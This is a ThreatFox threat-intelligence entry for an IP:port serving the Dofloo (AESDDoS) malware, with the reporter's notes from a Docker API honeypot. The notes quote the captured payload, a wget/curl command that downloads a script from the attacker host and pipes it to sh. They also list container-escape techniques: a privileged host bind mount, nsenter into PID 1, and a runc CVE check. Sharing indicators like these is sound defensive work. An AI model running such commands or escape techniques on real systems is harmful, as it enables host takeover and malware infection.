ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 151.242.125.187:80.

Database Entry

IOC ID: 1817199
IOC: 151.242.125.187:80
IOC Type: ip:port
Threat Type: payload_delivery
Malware: Dofloo
Malware alias: AESDDoS
Confidence Level: high (85%)
Is compromised?: False
ASN: AS61112 AkileCloud
Country: GB
First seen: 2026-05-22 11:36:07 UTC
Last seen: never
UUID: 6ff2c91e-55b8-11f1-b930-42010aa4000a
Reporter: nullblue67
Reward: 5 credits from ThreatFox
Tags: container-breakout, docker-exploit, Downloader, nsenter-escape, privileged-container

nullblue67
Captured 2026-05-22 02:00-05:00 UTC via Docker API honeypot (/containers/create). Base64-encoded payload: wget -O- http://151.242.125.187/dck | sh || curl -s http://151.242.125.187/dck | sh. Three distinct exec techniques observed targeting Docker daemon: (1) sh -c with Privileged:true + Binds:/:/host (full host filesystem breakout), (2) nsenter --target 1 --mount --uts --ipc --net --pid (process-namespace escape to PID 1), (3) container exec checking RUNC_ACCESSIBLE (CVE-2024-21626 runc escape recon). Attackers: 45.198.224.5 (Vpsvault.host SC, score 1000+, multiple hit waves), 193.160.100.163 (PacketHub, sibling /24 of previously-reported junko-enoshima cluster 193.160.100.154). Host: AKILE LTD (HK).